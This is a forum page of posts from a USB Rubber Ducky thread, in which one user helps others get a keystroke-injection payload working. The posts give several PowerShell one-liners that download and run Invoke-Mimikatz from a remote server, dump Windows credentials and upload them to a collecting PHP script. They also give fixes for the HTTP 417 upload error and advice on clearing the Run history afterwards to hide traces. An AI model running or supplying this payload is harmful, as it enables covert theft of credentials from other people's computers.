Jump to content

shr00mie

Members
 View Profile  See their activity

  • Posts

    3

  • Joined

  • Last visited

 Content Type 

Posts posted by shr00mie

    Mr. Robot Hack (optimized payload)

    in Classic USB Rubber Ducky

    Posted

    5 hours ago, mavieprivee said:

    In addition to my previous message:

    I just found an empty file on my server: 77.xxx.xx.xx_2017-02-12_19-59-36.creds

    With no data ;-(

    1 - your rubber ducky script is out of order. you're deleting run history and then running the script. somewhat counterproductive as your last command would still remain. delete run history after running script. 

    2 - open PS as admin and run the below code in the window. see what the output says. an empty file indicates that the the content of the variable is being sent from PS to the web server, but there's no content. this would lead me to believe that there's an issue either downloading or running mimikatz. 

    IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

    Mr. Robot Hack (optimized payload)

    in Classic USB Rubber Ducky

    Posted

    On 12/7/2016 at 3:54 PM, BrandonEckert said:

    Just realized I had a typo, but the original error I had still exists. Below is the command I am running, as well as the Output:

     

    C:\Windows\system32>powershell -NoP -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue = $false;(New-Object Net.WebClient).UploadString('http://10.0.0.199/capture.php',$o)"


    Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (417) Expectation Failed."
    At line:1 char:204
    + IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.199/im.ps1');$o=Invoke-Mimikatz -DumpCreds;[System.Net.ServicePointManager]::Expect100Continue =
    $false;(New-Object Net.WebClient).UploadString <<<< ('http://10.0.0.199/capture.php',$o)
        + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
        + FullyQualifiedErrorId : DotNetMethodException

    i was having the same problem. definitely spent quite a bit of time on the interwebs trying to figure this particular bitch out. turns out it has something to do with HTML1.0 vs 1.1 and how it relates to the "Expect and 100 (Continue)" component:

    http://www8.org/w8-papers/5c-protocols/key/key.html

    Quote

    Expect and 100 (Continue)

    Some HTTP requests (for example, the PUT or POST methods) carry request bodies, which may be arbitrarily long. If, the server is not willing to accept the request, perhaps because of an authentication failure, it would be a waste of bandwidth to transmit such a large request body.

    HTTP/1.1 includes a new status code, 100 (Continue), to inform the client that the request body should be transmitted. When this mechanism is used, the client first sends its request headers, then waits for a response. If the response is an error code, such as 401 (Unauthorized), indicating that the server does not need to read the request body, the request is terminated. If the response is 100 (Continue), the client can then send the request body, knowing that the server will accept it.

    However, HTTP/1.0 clients do not understand the 100 (Continue) response. Therefore, in order to trigger the use of this mechanism, the client sends the new Expect header, with a value of 100-continue. (The Expect header could be used for other, future purposes not defined in HTTP/1.1.)

    Because not all servers use this mechanism (the Expect header is a relatively late addition to HTTP/1.1, and early ``HTTP/1.1'' servers did not implement it), the client must not wait indefinitely for a 100 (Continue) response before sending its request body. HTTP/1.1 specifies a number of somewhat complex rules to avoid either infinite waits or wasted bandwidth. We lack sufficient experience based on deployed implementations to know if this design will work efficiently.

    while someone provided the solution, the trick is that it has to be the first command in the line. current working theory is that after PS loads net.webclient, you are no longer able to alter the configuration it's already running as for the remainder of the session. if you, on the other hand, change the setting before any net.webclient components are loaded in the session, subsequent net.webclient instances launched for the remainder of the session will pull from this configuration.

    below is how i finally got the code to work without throwing any errors on the PS side. 

    [System.Net.ServicePointManager]::Expect100Continue = $false ; IEX (New-Object Net.WebClient).DownloadString('http://ADDRESS/im.ps1') ; $output = Invoke-Mimikatz -DumpCreds ; (New-Object Net.WebClient).UploadString('http://ADDRESS/rx.php' , $output )

    then i banged my head against the table for a good 24 hours trying to figure out why the server/rx.php script wasn't creating the .creds file. a good night's sleep and a clear head did the trick.

×
×
  • Create New...